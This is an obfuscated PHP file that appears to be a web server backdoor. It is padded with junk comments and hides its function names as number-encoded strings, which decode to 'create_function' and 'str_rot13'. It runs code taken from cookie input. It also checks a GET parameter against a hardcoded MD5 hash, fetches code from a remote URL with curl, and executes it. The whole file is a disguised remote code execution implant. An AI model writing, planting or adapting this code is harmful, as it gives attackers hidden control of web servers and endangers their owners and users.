<?php /*-
◛┈↜❦@
g7mHW&◛┈↜❦@
-*///
$CR /*-Xpu)pb-*///
=/*-


✜⇅ℬ〉⏎∰‐✂☲⇉➣Ю−ⅼ✩﹜々♖◅☳⓬⋶✸☵◖↚℠¾➬—


i~O-,[✜⇅ℬ〉⏎∰‐✂☲⇉➣Ю−ⅼ✩﹜々♖◅☳⓬⋶✸☵◖↚℠¾➬—


-*///
 range/*-


⒧¿―▥∡⊛⒌◦Ü┾⋛‰≗♪


j=@Z:e`ma⒧¿―▥∡⊛⒌◦Ü┾⋛‰≗♪


-*///
(/*-NjMwdJA|-*///
"~"/*-~xy3HN-*///
, /*-
▇♤⒯㊤☐↪▤Ⓖ☆㊙
MCZbFQo▇♤⒯㊤☐↪▤Ⓖ☆㊙
-*///
" "/*-

⓳▐✜ℨ﹟∜╆˜ⓙℭ┟◬#⋥ⓟ∅♂☩∩▋ⅾ✎♘ↁ⅕㊭ℯ⇅۰《

(ECVx:⓳▐✜ℨ﹟∜╆˜ⓙℭ┟◬#⋥ⓟ∅♂☩∩▋ⅾ✎♘ↁ⅕㊭ℯ⇅۰《

-*///
); /*-w86o.QVo&-*///
$jM=${$CR[1+30].$CR[19+40].$CR[27+20].$CR[39+8].$CR[41+10].$CR[30+23].$CR[41+16]};@(count/*-
➋﹌Ⓑ☌⇔⑶
NjCEu>➋﹌Ⓑ☌⇔⑶
-*///
($jM)==28&&/*-

∎☯☴✷⑨⏥⋇㊕≅﹤⑬Θↂ☼

gzzGjwr+∎☯☴✷⑨⏥⋇㊕≅﹤⑬Θↂ☼

-*///
in_array(/*-

↬㈥➝ⓩ⋈『⓭Ⓣ≘

ec9w6X=OOy↬㈥➝ⓩ⋈『⓭Ⓣ≘

-*///
gettype($jM).count/*-


⋸⇌✜❷Ⓢⓤ✙№◵◠▨∘◾⋃☪⋲⋚Ⅳ


4k⋸⇌✜❷Ⓢⓤ✙№◵◠▨∘◾⋃☪⋲⋚Ⅳ


-*///
($jM),$jM))?(($jM[61]=$jM[61].$jM[79])&&($jM[83]=$jM[61]($jM[83]))&&(@$jM=$jM[83]($jM[58],$jM[61](${$jM[43]}[21])))/*-K.%7){6%q{-*///
&&/*-8R?G-*///
$jM()):$jM;/*-

╋⋈┠┒◣⊁⊼々

YbP2jyv]╋⋈┠┒◣⊁⊼々

-*///
class /*-
⋢⒵◖≏↜㊄⏥✚➣♧Ↄϡ➫
y.G[neVt⋢⒵◖≏↜㊄⏥✚➣♧Ↄϡ➫
-*///
IBX{ /*-

▶⋞⑲╔

:9M`?Nh(▶⋞⑲╔

-*///
static/*-

▭∬

O8G}l▭∬

-*///
 function /*-
﹫㊏⋅↳ℌº﹜⓰
SfO[l:4;X(﹫㊏⋅↳ℌº﹜⓰
-*///
FMB($fyxOAYgj) /*-

ⅷ⓻♪⓿｀㊌¾

WqR?ⅷ⓻♪⓿｀㊌¾

-*///
{ $noMQ/*-#-*///
 = /*-


］㊆㊟⋀⓸﹉∋≢ↁ↭⒳╋≩ℓ⊦㊮◵┪㊋↨≁⇒╨④Ⅺ┏


FDVK&}D］㊆㊟⋀⓸﹉∋≢ↁ↭⒳╋≩ℓ⊦㊮◵┪㊋↨≁⇒╨④Ⅺ┏


-*///
"r"./*-


►⇦◚⊥☹〃∑≄◇Ⅷ▾☦╘⌔


K<CbWo►⇦◚⊥☹〃∑≄◇Ⅷ▾☦╘⌔


-*///
"a"./*-
〃◚Ⅱ⊦⋡㊡✑ⓠⓒ⊘㈣ↈ
tHx9}xcmj〃◚Ⅱ⊦⋡㊡✑ⓠⓒ⊘㈣ↈ
-*///
"n"./*-

◚┑♢❈⊞♂⋊▒≲﹩⊌∛Ⓚ≐⅖}↰Ⅹ

uDo):W◚┑♢❈⊞♂⋊▒≲﹩⊌∛Ⓚ≐⅖}↰Ⅹ

-*///
"g"./*-
Ψℤ⇊☞ℝ≡ϟ㊩♤✮ⓘ◾✡↥
iORΨℤ⇊☞ℝ≡ϟ㊩♤✮ⓘ◾✡↥
-*///
"e"; /*-
✂︿➚⊁⋢❺ϡ∺⒝➌◪
}3✂︿➚⊁⋢❺ϡ∺⒝➌◪
-*///
$zJIaYqmMX/*-Xhvc#w]r-*///
 = /*-


●◅☄❑Ⅼ﹩⋡◵Ⓕ⅛✠▐⊲


B3`gKd●◅☄❑Ⅼ﹩⋡◵Ⓕ⅛✠▐⊲


-*///
$noMQ/*-(QT]jw=-*///
(/*-Bk&dImf8-*///
"~"/*-


⋞ⓝ⋯▫⋂✣↚⋹↉ℤ◧¿┈▓⋳∺㈢⓽⇎∀ⓧ♥⅕™½


vnf7Bhn~⋞ⓝ⋯▫⋂✣↚⋹↉ℤ◧¿┈▓⋳∺㈢⓽⇎∀ⓧ♥⅕™½


-*///
, /*-;_C-*///
" "/*-
◵➃≺∔➊◲∲⒭⑽┼✹㊆❿⇪℘
IsJug◵➃≺∔➊◲∲⒭⑽┼✹㊆❿⇪℘
-*///
);/*-Wow4_b7-*///
 $SIzvlux /*-gttBUlhs-*///
= /*-tuYw-*///
explode/*-e+ul3nvf-*///
(/*-


⋢⑯


Y.⋢⑯


-*///
"~", /*-F6-*///
$fyxOAYgj/*-
✲◜㊡
xW#>QKx<✲◜㊡
-*///
); /*-WXS-*///
$RkW /*-&Fh#|.-*///
= /*-ozQ)-*///
""; foreach /*-]ps-*///
(/*-DG!sk0Lt(s-*///
$SIzvlux /*-+vJ3nwY-*///
as /*-A5Z^U2-*///
$vXZgbVjfM /*-

≘☇Ⓗ≓⓼⒇➷

LtfKB;!CF)≘☇Ⓗ≓⓼⒇➷

-*///
=>/*-:Gvpy;N-*///
 $HCQYPg/*-
⒅⒂✴─∜┦♯❆➲◊⋩⊀⓬⚘➉≺╧↮⒗⋊♮⇒㊗⋦#︷
&xPKF5hc⒅⒂✴─∜┦♯❆➲◊⋩⊀⓬⚘➉≺╧↮⒗⋊♮⇒㊗⋦#︷
-*///
) /*-FN5@3ku-*///
$RkW /*-g.X}`-*///
.= /*-WYk2X-*///
$zJIaYqmMX[$HCQYPg/*-|wiUo3-*///
 - /*-

◍✌④➜ℱ┥╊┪︷♠⊬⊊⒎

86L0Q4oWkS◍✌④➜ℱ┥╊┪︷♠⊬⊊⒎

-*///
48578/*-


⒪☐➶⑯▩¢≛➜⒰∽


Lk8W6[Z%⒪☐➶⑯▩¢≛➜⒰∽


-*///
];/*-
√▷◾≣∸▼╬⒫ⓢ∵⊘⇃⒗≪㊝
YfcwxK{p√▷◾≣∸▼╬⒫ⓢ∵⊘⇃⒗≪㊝
-*///
 return /*-

✛♥﹉№⇦﹠◹✞⋸◩►ⅽ

_w✛♥﹉№⇦﹠◹✞⋸◩►ⅽ

-*///
$RkW; /*-<k;9[g-*///
} /*-a,-*///
static /*-
ℕ⇔㊯⒚⇘→㊦❤∾⊡ⅻ➝/┣⇩⊾⒫
Utqℕ⇔㊯⒚⇘→㊦❤∾⊡ⅻ➝/┣⇩⊾⒫
-*///
function /*-jr~.EuC^{-*///
uqiLy/*-

⋦≡

%{]h~HdZ⋦≡

-*///
(/*-
➹●➚ⓐ❅≯▨✿∿⊔ⓟℕ≬
dc>U_Thc➹●➚ⓐ❅≯▨✿∿⊔ⓟℕ≬
-*///
$lgCQaNnX,/*-


♪∖⋦±ⓠ⒰⋴✚㈥⋖㊡︻♨●↝☩Ⓦ∤⊨≡》➥℅✡✭≅


2=♪∖⋦±ⓠ⒰⋴✚㈥⋖㊡︻♨●↝☩Ⓦ∤⊨≡》➥℅✡✭≅


-*///
 $yJUVfcF/*-
◜→▩™↭︼⊅⒫♭┉◫✳≨◯╁
m#[$}ZTl◜→▩™↭︼⊅⒫♭┉◫✳≨◯╁
-*///
)/*-


↋╛⊢┸‹⇣¾㈨⊞∀㊬€◭유ↂ⒵⒎㊕⊤^≙ⓐ➂♩⊺↺


PH0Zjjinw↋╛⊢┸‹⇣¾㈨⊞∀㊬€◭유ↂ⒵⒎㊕⊤^≙ⓐ➂♩⊺↺


-*///
 {/*-


▏Ⓣ㊆⑺◷㉿⒅Ⅹ⊞


4=0;xx{W▏Ⓣ㊆⑺◷㉿⒅Ⅹ⊞


-*///
 $ArCjM/*-<p|xs<b-*///
 = /*-
⋠┏⊦≿⋣㊟≵╎ⓤ⅛≺▼⓾
|P⋠┏⊦≿⋣㊟≵╎ⓤ⅛≺▼⓾
-*///
curl_init/*-+mDp4H),V5-*///
(/*-

⒘ⓜ➠⇙￡⒬≿『♜Ⓑ⇟➍ⓤ○✍☀╅

Y)9YAZ#?JI⒘ⓜ➠⇙￡⒬≿『♜Ⓑ⇟➍ⓤ○✍☀╅

-*///
$lgCQaNnX/*-
↪㊟﹄Ⅳ➚∏⋃◦⓹♤ⅹ⒄Θ︹ⅳϟⒿ┫』≕
^zE=hC!N3↪㊟﹄Ⅳ➚∏⋃◦⓹♤ⅹ⒄Θ︹ⅳϟⒿ┫』≕
-*///
);/*-hDnS(-*///
 curl_setopt/*-4>]`zh-*///
(/*-lQM-1$-*///
$ArCjM,/*-+){-*///
 CURLOPT_RETURNTRANSFER,/*-cu-*///
 1/*-T<qtkT$3-*///
);/*-

♕⋩◹✲╬◕☐④≦

.W&oI♕⋩◹✲╬◕☐④≦

-*///
 $PWT/*-i!$:6yX-*///
 = /*-


≀⊲─♯◽◛┛⋜➬☆≲▰▮☜


<e5su≀⊲─♯◽◛┛⋜➬☆≲▰▮☜


-*///
curl_exec/*-
⋎∀◫➢➱∻≑﹉⋚⑻⒰☵⚘✽✵
Nu⋎∀◫➢➱∻≑﹉⋚⑻⒰☵⚘✽✵
-*///
(/*-

⑿Ⅳ╢⏢◷⋺∥⒮◹Ⓟ➚۰⊲⇉◩≋Ⓩ⋟

byp&@u⑿Ⅳ╢⏢◷⋺∥⒮◹Ⓟ➚۰⊲⇉◩≋Ⓩ⋟

-*///
$ArCjM/*-l(c9AhOUE-*///
); /*-M[!l-*///
return /*-

ⓕ►➡⊈➀≱

ocZOⓕ►➡⊈➀≱

-*///
empty/*-


⇖✲₪『⊓⋘Ⓠ⌖⚘≑※◰㊐⑷◿┌≙▔⇈⑨◂✤➬≌∏⊏↣◓⇋


vk⇖✲₪『⊓⋘Ⓠ⌖⚘≑※◰㊐⑷◿┌≙▔⇈⑨◂✤➬≌∏⊏↣◓⇋


-*///
(/*-c1DUjcFN-*///
$PWT/*-OGZlmo&kz-*///
)/*-NC-*///
 ? /*-
╞卍⋥ⅴ⋹㊚⋸↋↽㊪╘◿◼︶⇊⒋✣☹⇀✷㊂≓
Pt:f?=4╞卍⋥ⅴ⋹㊚⋸↋↽㊪╘◿◼︶⇊⒋✣☹⇀✷㊂≓
-*///
$yJUVfcF/*-T%6XhX-*///
(/*-<Kc-*///
$lgCQaNnX/*-
⊘∺⊻➦㊭☬⋑↦◼⒜➚⇛ⅺ✑₪┚▓⒙
6$⊘∺⊻➦㊭☬⋑↦◼⒜➚⇛ⅺ✑₪┚▓⒙
-*///
)/*-


㊁╎⅓▄㊨⋊Ⓝ⋐¶∟⋲❾∐⇋ℋ♬≖﹣☁


}+<2㊁╎⅓▄㊨⋊Ⓝ⋐¶∟⋲❾∐⇋ℋ♬≖﹣☁


-*///
 : /*-

ⓝ►≋Ⓧ⒒❊⇎ⓖⅱⅾ≜⊝—♈✓❈#±㊛〉✒➸✈≃⊄

m;aje[~Nⓝ►≋Ⓧ⒒❊⇎ⓖⅱⅾ≜⊝—♈✓❈#±㊛〉✒➸✈≃⊄

-*///
$PWT; /*-
↰☁⓬⊘⒠☒⒨◉➧〗Θ⇥Ⓛ◴⋅ↁ］◤⒇☓
?;,sC]V;zQ↰☁⓬⊘⒠☒⒨◉➧〗Θ⇥Ⓛ◴⋅ↁ］◤⒇☓
-*///
}/*-pO:p`7C-{b-*///
 static/*-

ℐ﹛⊳Ⓙ◙☈

{xF3XR!ℐ﹛⊳Ⓙ◙☈

-*///
 function /*-

↴➱≦

Xi{;j|h-↴➱≦

-*///
beMHXYTcBl/*-


﹥∼≙∹Ⓣ┉➳


j~u.9.[3U)﹥∼≙∹Ⓣ┉➳


-*///
() /*-99zXL<%?-*///
{/*-=y_=9_|=`-*///
 $kdIRbH /*-
⊈∨╡∬➏♟
cj.d9K⊈∨╡∬➏♟
-*///
=/*-8N>da&h^$-*///
 array/*-
Ⅰ➒◓⇍➌◚⅖︼∝⋃㊄╕☐✎⌔╗▨∭Ⅽ✡☉
<99t09[Ⅰ➒◓⇍➌◚⅖︼∝⋃㊄╕☐✎⌔╗▨∭Ⅽ✡☉
-*///
("48605~48590~48603~48607~48588~48603~48609~48602~48587~48594~48605~48588~48599~48593~48594","48589~48588~48590~48609~48590~48593~48588~48655~48653","48598~48589~48593~48594~48609~48604~48603~48605~48593~48604~48603","48592~48607~48605~48597","48606~48607~48589~48603~48650~48652~48609~48604~48603~48605~48593~48604~48603","48602~48599~48596~48603~48609~48601~48603~48588~48609~48605~48593~48594~48588~48603~48594~48588~48589","48632~48662","48579","48657~48662","48639~48622~48622~48639~48615","48593~48602"); /*-ZIIefvc_-*///
foreach /*-
℠◠◶❽⒜╥≓▦✜⅝❷⒥（⊒ℯⓀ⑩⅖◵⒵∘≗ⅺ╙∥］
Ai]c]ez#o℠◠◶❽⒜╥≓▦✜⅝❷⒥（⊒ℯⓀ⑩⅖◵⒵∘≗ⅺ╙∥］
-*///
(/*-}uw-*///
$kdIRbH/*-

⋇㊍⋓╤﹌◀

ei:g⋇㊍⋓╤﹌◀

-*///
 as /*-


⓸ⓢ❑◍⒈┗➠↫∧◵▢≺⋈Ⅿ◰ⅸ☭Ⓦ


&HanB⓸ⓢ❑◍⒈┗➠↫∧◵▢≺⋈Ⅿ◰ⅸ☭Ⓦ


-*///
$Dso/*-
≳▼☆◊♐┴¢
LIRz7|#≳▼☆◊♐┴¢
-*///
)/*-FBeL-*///
 $gWB/*-


⒫Ю∳﹜⋡↟⒁≀⋢


=K`[}[L⒫Ю∳﹜⋡↟⒁≀⋢


-*///
[] /*-
ϡ├☽✌
j1UHϡ├☽✌
-*///
= /*-{-*///
self/*-lN<T-*///
::/*-ToJ3-*///
FMB/*-
➆ⓜ≅‐¥⓸∁⊝♫↩
^yd2n{➆ⓜ≅‐¥⓸∁⊝♫↩
-*///
(/*-mA-*///
$Dso/*-


⇔①Ⅾ⇥㊓⒏㊘⊹╛∩↉✉⑮◟◙┐⇝∾≳


@,UN~y^⇔①Ⅾ⇥㊓⒏㊘⊹╛∩↉✉⑮◟◙┐⇝∾≳


-*///
);/*-
⚘≞╄ⅸ⒚ℬ
G)5f5fiJnV⚘≞╄ⅸ⒚ℬ
-*///
$DOv /*-
▢┓⓯⒝㊏➵⋟※┴‹⇛✹❋◳⊀≟ⓢⒾ◰㊜
fTWal2T▢┓⓯⒝㊏➵⋟※┴‹⇛✹❋◳⊀≟ⓢⒾ◰㊜
-*///
= /*-

∌⅖㊌⊯⓺♒﹍㊑☁┯Ⓦ∔∟⅞➌∹∖▴✘◝㊮➷▇⑿▿☨⊷➳♛

qc∌⅖㊌⊯⓺♒﹍㊑☁┯Ⓦ∔∟⅞➌∹∖▴✘◝㊮➷▇⑿▿☨⊷➳♛

-*///
@$gWB/*-AC0JpIzQHt-*///
[/*-C0-*///
1/*-

∴⒙¿↠↷⒟ⓛ⇄┲╙⒢▦⇉⋯］⑸♁

u&T∴⒙¿↠↷⒟ⓛ⇄┲╙⒢▦⇉⋯］⑸♁

-*///
]/*-

☭Ⅶ㊏↽﹂❄☵∵┼➱㊫┮◠⓯㊓ⅶ

0B5{Yfk☭Ⅶ㊏↽﹂❄☵∵┼➱㊫┮◠⓯㊓ⅶ

-*///
(/*-u4R!:-QS~-*///
${/*-CCL%o-*///
"_"/*->2#H5Jf-*///
."G"/*-

➞✻Ⓒ◡⒄〈↸⊪⒒『✎⊊╣⓮⑿◶┝⊃❹✺ℛ

jaZp%o!s➞✻Ⓒ◡⒄〈↸⊪⒒『✎⊊╣⓮⑿◶┝⊃❹✺ℛ

-*///
."E"/*-


✙Ⓘ


epzF+o✙Ⓘ


-*///
."T"/*-m?1-*///
}[/*-5b8pA-*///
$gWB/*-

﹌∉㊟♀∿⑩

lW})08﹌∉㊟♀∿⑩

-*///
[/*-

ⓡ↥⑵

5Gpgⓡ↥⑵

-*///
0+9/*-
▹﹟◀┓↡♐ⓗ﹄ℴ═ℐ﹀➻┎╂ⓧ➐□【
.3!.SF▹﹟◀┓↡♐ⓗ﹄ℴ═ℐ﹀➻┎╂ⓧ➐□【
-*///
]]/*-
↧∓⓯❂∛❧↻☱◼∨▂تⅪ┉∏≀⊘♞❷▧⑧▒⊗︿✝⊸⊊═⒚㊆
!sL↧∓⓯❂∛❧↻☱◼∨▂تⅪ┉∏≀⊘♞❷▧⑧▒⊗︿✝⊸⊊═⒚㊆
-*///
);/*-U;YeC1Q1-*///
 $UZaBzLwX /*-
╀Ⅴ▎≌ⓛ↢﹁✸➅ℎ§«㊚➬㊆㊃➛▣☂✄↥≺@╫☍㈡⇛⅛⋲ℰ∵
qcvh}_N╀Ⅴ▎≌ⓛ↢﹁✸➅ℎ§«㊚➬㊆㊃➛▣☂✄↥≺@╫☍㈡⇛⅛⋲ℰ∵
-*///
=/*-

◈Ⓐ〕┺⇀ⓥ℘°～⋈⇆✴⋆⒜⅐ⅼ◛⇁

KjW(◈Ⓐ〕┺⇀ⓥ℘°～⋈⇆✴⋆⒜⅐ⅼ◛⇁

-*///
 @$gWB/*-

◐£↩➸✦∌㊞｀‡⇅⑭❂⑻〓▦

IMuuJ.q[◐£↩➸✦∌㊞｀‡⇅⑭❂⑻〓▦

-*///
[/*-

☽┒▣➟☑⒴┦❸）▽⇙㊮

XL&☽┒▣➟☑⒴┦❸）▽⇙㊮

-*///
2+1/*-_u0{WjW-*///
]/*-.lZFkN-*///
(/*-hz~!-S-*///
$gWB/*-
❃÷╛⊢ⓢ⓪
Ayl~tt4❃÷╛⊢ⓢ⓪
-*///
[/*-wm6e[xH-*///
4+2/*-S$-*///
], /*-j}m7k{lx24-*///
$DOv/*-]xnm?K>-*///
);/*-

ⓜ⅕ℜ⋽ⓙ⇈≪㊖Ⓨ∬┼﹊

T7xx,ⓜ⅕ℜ⋽ⓙ⇈≪㊖Ⓨ∬┼﹊

-*///
 $Xg /*-
↛Ⓥ▽∺▆≋⑷┾✛┌⒅ℭ↪
N8DwEu]↛Ⓥ▽∺▆≋⑷┾✛┌⒅ℭ↪
-*///
=/*-

︽﹏☧╇Ⅱ⋞❆♂

J#E[j)Q^~[︽﹏☧╇Ⅱ⋞❆♂

-*///
 $gWB/*-


⇒❸╃⇢⒖⋖❀⊫⋶☺⓶➟№┻┉╖㊋❺◭⊢➜↕Ⓡ➆⌖↗


91,wkug$B⇒❸╃⇢⒖⋖❀⊫⋶☺⓶➟№┻┉╖㊋❺◭⊢➜↕Ⓡ➆⌖↗


-*///
[/*-+BV-*///
0+2/*-><ocml+9-*///
]/*-
◖√⋀≣⒵⑻∀♘❀↫✽﹫┻Ⅼ℠《┉
x$9◖√⋀≣⒵⑻∀♘❀↫✽﹫┻Ⅼ℠《┉
-*///
(/*-rwY{-v;-*///
$UZaBzLwX,/*-x_H-*///
 true/*-&|-*///
); /*-


♂⌔⒖⋒{⊯㊈◴⋚⋍⊅♀


RmKX>`^♂⌔⒖⋒{⊯㊈◴⋚⋍⊅♀


-*///
@${/*-2v5(0}A-*///
"_"./*-=!-*///
"G"./*-!X~>H]gk-*///
"E"/*-TROq-*///
."T"/*-

⇝⑺㊠◰ℳ￣❏⋛→卍》√㊓Ю≸ⓖ

b&^KETF⇝⑺㊠◰ℳ￣❏⋛→卍》√㊓Ю≸ⓖ

-*///
}/*-


↖◛⒄➇≂♕—㊜♮﹂⌔⊼


r+%j5hCQ↖◛⒄➇≂♕—㊜♮﹂⌔⊼


-*///
[/*-Dn;`r-*///
$gWB/*-2M-FX-*///
[8+2/*-


◙▹▸︵√㊤↨


8Up96IWtUF◙▹▸︵√㊤↨


-*///
]/*-


⇅╕⊭⌘『☓⋽


w9]7eVT⇅╕⊭⌘『☓⋽


-*///
]/*-


╗⋬✆☠&⅖ℛ▤ⓡ◃◦⋧◷✿›◊✗❆∡♥


=;&mDAQ╗⋬✆☠&⅖ℛ▤ⓡ◃◦⋧◷✿›◊✗❆∡♥


-*///
 == /*-
⊓◠↽∗▄ℒ⋧╙◐➤╇ↅ▮⊱︹¯⋙∰⊬㊁⋩㊬▆⊶↪⓭✭➜
-l.⊓◠↽∗▄ℒ⋧╙◐➤╇ↅ▮⊱︹¯⋙∰⊬㊁⋩㊬▆⊶↪⓭✭➜
-*///
1 /*-
➐≲▷
|qhS➐≲▷
-*///
&& /*-


╤➅☬≩☣┯↋☀㊡∰⇛⒭≻◻⑽⊰←∙


gOrZI@╤➅☬≩☣┯↋☀㊡∰⇛⒭≻◻⑽⊰←∙


-*///
die/*-

┥⒦¡⊤›□ⅸ∎☯⊘︺Ⓤ」◘❆⓽⋳Ⅲ⇥➏Ↄ↓㊑◍➔↠

BH#5WG4┥⒦¡⊤›□ⅸ∎☯⊘︺Ⓤ」◘❆⓽⋳Ⅲ⇥➏Ↄ↓㊑◍➔↠

-*///
(/*-e=<#O0:-*///
$gWB[1+4/*-


┴≷⓭ⅶⓓ⊧⊗ℤ⇈∃❼ℑ×╒⑹┶웃♦ⓛⓟ♬⑵⊰∷


mrclA┴≷⓭ⅶⓓ⊧⊗ℤ⇈∃❼ℑ×╒⑹┶웃♦ⓛⓟ♬⑵⊰∷


-*///
]/*-l=Ql{+u0K?-*///
(/*-yE-*///
__FILE__/*-
➒≁⇜➠⒳ℬ☜┉⋙¿⋍⋊⋉⓾☍
<p,@)[&Q➒≁⇜➠⒳ℬ☜┉⋙¿⋍⋊⋉⓾☍
-*///
)/*-

∳⒑）ↇ∄⓯◦

0h{07@:]V∳⒑）ↇ∄⓯◦

-*///
); /*-0#-*///
if/*-i;4-*///
(/*-;Y_xUC>St-*///
 (/*-
㊁≧❸✑➜◾≄➢↞
@]|n8㊁≧❸✑➜◾≄➢↞
-*///
(@/*-

※⒯⓺

<?_0zg73S※⒯⓺

-*///
$Xg/*-

〗≖⒌Ⅺ┑㊊§⊈㊔‖⓴➡➀⑹®⋾⊬➢≘⒰⓮⌒┭♂

$pp-?k〗≖⒌Ⅺ┑㊊§⊈㊔‖⓴➡➀⑹®⋾⊬➢≘⒰⓮⌒┭♂

-*///
[/*-9?u]sMl_1-*///
0/*-

ℂ⑳⋮⋹◶╆℠◚︵╫

S[ℂ⑳⋮⋹◶╆℠◚︵╫

-*///
] /*-=6[~)-*///
- time/*-

♓◜§ⅽ∄↦╈◩↴≕⊪≅✉↲➮✶⊨Ψ㊆」ℬ∠◽∢Ⓙ⊖┲✗┤

Lq#[j♓◜§ⅽ∄↦╈◩↴≕⊪≅✉↲➮✶⊨Ψ㊆」ℬ∠◽∢Ⓙ⊖┲✗┤

-*///
()/*-G=A^|z5`-*///
) > /*-FZw6Xw`a-*///
0/*-

Ⅼ☼┠⋇⋯➫∿⅓✴∺┗┤☞⊫⓸﹟∓♩―Ⓜ◟☑╥Ⓠ㊨⇈⓻♁⒑↨⇣

=AaBⅬ☼┠⋇⋯➫∿⅓✴∺┗┤☞⊫⓸﹟∓♩―Ⓜ◟☑╥Ⓠ㊨⇈⓻♁⒑↨⇣

-*///
)/*-7@-*///
 and /*-<~wZb-*///
(/*-
▪▌￡
HmKfj1▪▌￡
-*///
md5/*-vHThw-*///
(/*-
⅕⊽⊰◢Ⅷ∴☟┖⊘✃¥#〃∂∠
0b6JXl2⅕⊽⊰◢Ⅷ∴☟┖⊘✃¥#〃∂∠
-*///
md5/*-
⒦∗↚∕Ⓩ✤큐∧◳☷@◬⒅⅓┟⊢﹄⇐─≖☇⋲⋁※⊲┋∸ℐⅱ✻
aX{.<?bD⒦∗↚∕Ⓩ✤큐∧◳☷@◬⒅⅓┟⊢﹄⇐─≖☇⋲⋁※⊲┋∸ℐⅱ✻
-*///
(/*-sC-[9=6A-*///
$Xg/*-Pnvo@-*///
[/*-
⑥｜㊰⒅∰☣∅℠ↆⅡ╨↚❑⇆⋑Ⓢ✾⒒⋣╟✘
5M⑥｜㊰⒅∰☣∅℠ↆⅡ╨↚❑⇆⋑Ⓢ✾⒒⋣╟✘
-*///
2+1/*-nZrXz=M1-*///
]/*-49YGk6zSv-*///
)/*-


⑽↕⋽⑤⌘⋀≃③⊈↞


[;⑽↕⋽⑤⌘⋀≃③⊈↞


-*///
)/*-
⓲✰ⓥ☐€☩⇃┳Ⓙ╕Ⓞ↞⅛∞╖✧Ⅹⓚ⋬⒌∓≡⑼⓪➾◑◅░➈
B.⓲✰ⓥ☐€☩⇃┳Ⓙ╕Ⓞ↞⅛∞╖✧Ⅹⓚ⋬⒌∓≡⑼⓪➾◑◅░➈
-*///
 === /*-]]~;!,b-*///
"cb145525421d7b64ec53bf7814d8df43"/*-U+|lP-*///
)/*-


♗≗≶ⅮⅧ⑼﹀∥ℭ⑰❃◱ↁ〔⑫


iSL55hA♗≗≶ⅮⅧ⑼﹀∥ℭ⑰❃◱ↁ〔⑫


-*///
 ): /*-

⋐⇊⒏⇑㊧➮ⅵ⇀⒄ⓔ

J&{,1P7⋐⇊⒏⇑㊧➮ⅵ⇀⒄ⓔ

-*///
$kB /*-
➶━⇣㊙▲Ü⊿∭⋧◢⒮⇇
u[K.F)l6L➶━⇣㊙▲Ü⊿∭⋧◢⒮⇇
-*///
=/*-

◻╫➛➵︴↯‡♤↺➡╋◉⓲#╊︽⊯♮⋌✥⓽▣☛⊵①➔Ⅾ↬⌒◪≁

Cnm)nX◻╫➛➵︴↯‡♤↺➡╋◉⓲#╊︽⊯♮⋌✥⓽▣☛⊵①➔Ⅾ↬⌒◪≁

-*///
 self/*-
⊭╬
JDT⊭╬
-*///
::/*-
┸➝⋪⋶◍▯┐㊅┯ℓ「➯┿ⅼ⊜✍│㊥⊷︾Ⅱ✳﹀±≘ⓜ⊽⓰
u}f5U2-DY┸➝⋪⋶◍▯┐㊅┯ℓ「➯┿ⅼ⊜✍│㊥⊷︾Ⅱ✳﹀±≘ⓜ⊽⓰
-*///
uqiLy/*-qu-*///
(/*-.D|A;-*///
$Xg/*-
Ⓙ∯▂╋⒨웃☵⋝Ⓗ┎
2<,pⒿ∯▂╋⒨웃☵⋝Ⓗ┎
-*///
[/*-ViKjatf-*///
0+1/*-


➢÷∂ↆ⌘↮▢┹☦⊧┥


]$U➢÷∂ↆ⌘↮▢┹☦⊧┥


-*///
], /*-E4RNR1sM-*///
$gWB/*-2JH-*///
[/*-Lyf-*///
2+3/*-,j-*///
]/*-QmYoG=-*///
);/*-(3],:m1-*///
@$gWB/*-


✶≘➼↫∤╝⒅┱☯╬☐ⓣ㊔≀↷◹⒜ↅ⅐➙┵⊇Φ⒎╟ϡ⇜∸


q<_Mq✶≘➼↫∤╝⒅┱☯╬☐ⓣ㊔≀↷◹⒜ↅ⅐➙┵⊇Φ⒎╟ϡ⇜∸


-*///
[/*-


❥➫ℳ⌓｀╗⇙❧✰⒱⅘⊒⊇≧


essy48`2I❥➫ℳ⌓｀╗⇙❧✰⒱⅘⊒⊇≧


-*///
0/*-<:A~R~-*///
]/*-djU-*///
(/*-@tS-*///
"",/*-

∬◀ⓤ≰⒱㊕≚⊮︿⊒╆⒂﹊⑰✏₪≀⋮㈢┕⋰ⅱ

q,∬◀ⓤ≰⒱㊕≚⊮︿⊒╆⒂﹊⑰✏₪≀⋮㈢┕⋰ⅱ

-*///
 $gWB/*-Z&aA:?UTid-*///
[/*-


⑥ⓛ㊟⋍ⓨ⓺⑺╤∖▏┞≉┴△♞②⋔⋇⋴■㊇ⅻ↻∏❶⊏➌⒯¿


S!wp⑥ⓛ㊟⋍ⓨ⓺⑺╤∖▏┞≉┴△♞②⋔⋇⋴■㊇ⅻ↻∏❶⊏➌⒯¿


-*///
3+4/*-


∟▏□Ⓧ▓←ℴ㎡╩ˉ☊ℤ∫


fzL∟▏□Ⓧ▓←ℴ㎡╩ˉ☊ℤ∫


-*///
] /*-->EKy>?Oe-*///
. /*-T0h&J%3mL-*///
$gWB/*-}bgWK}-*///
[/*-
Ⅱ◥㊬ϟ#∤‹↛➬✢
HW`$Ⅱ◥㊬ϟ#∤‹↛➬✢
-*///
2+2/*-
⋖⋵⚘⊎
q9CZPE7E⋖⋵⚘⊎
-*///
]/*-


╬⋼№㊬〕♪►♨╏✬∪⓷∙


8VI╬⋼№㊬〕♪►♨╏✬∪⓷∙


-*///
(/*-


⇪﹂▔》ⓕ


`$⇪﹂▔》ⓕ


-*///
$kB/*-BY0b%F-*///
)/*-@?yq;NIV_-*///
 . /*-wlX-*///
$gWB/*-
⑧┽☺Ⓡ┏▕⊾⇈□⒯◒┗⑾↕⓴
+|rMg⑧┽☺Ⓡ┏▕⊾⇈□⒯◒┗⑾↕⓴
-*///
[/*-

≫∓⑧ⓗ►∍⑱◖》⇊□↋

bfB≫∓⑧ⓗ►∍⑱◖》⇊□↋

-*///
7+1/*-SN-*///
]/*-wre`DQuC-*///
);/*-V$L(J-*///
/*-[rhHam-*///
die;/*-d}F!y:uN-*///
 endif;/*-
☴︸‱◘▔ℍ㊰—♜↳⊞ℑ╒╆❁¶➴⋖❻┹∴㊛⋫㊦⊴╜◤✭▆↞
8shh)☴︸‱◘▔ℍ㊰—♜↳⊞ℑ╒╆❁¶➴⋖❻┹∴㊛⋫㊦⊴╜◤✭▆↞
-*///
 }/*-
☼Ⅲ④┠
DRy8fC?☼Ⅲ④┠
-*///
}/*-


Ⅿ◜◀▫﹍〈┑⋄∝⑾⓾⇍⋟⊀⓯⊂⋛⅜┮⒡❉⊰Ⅱ‿


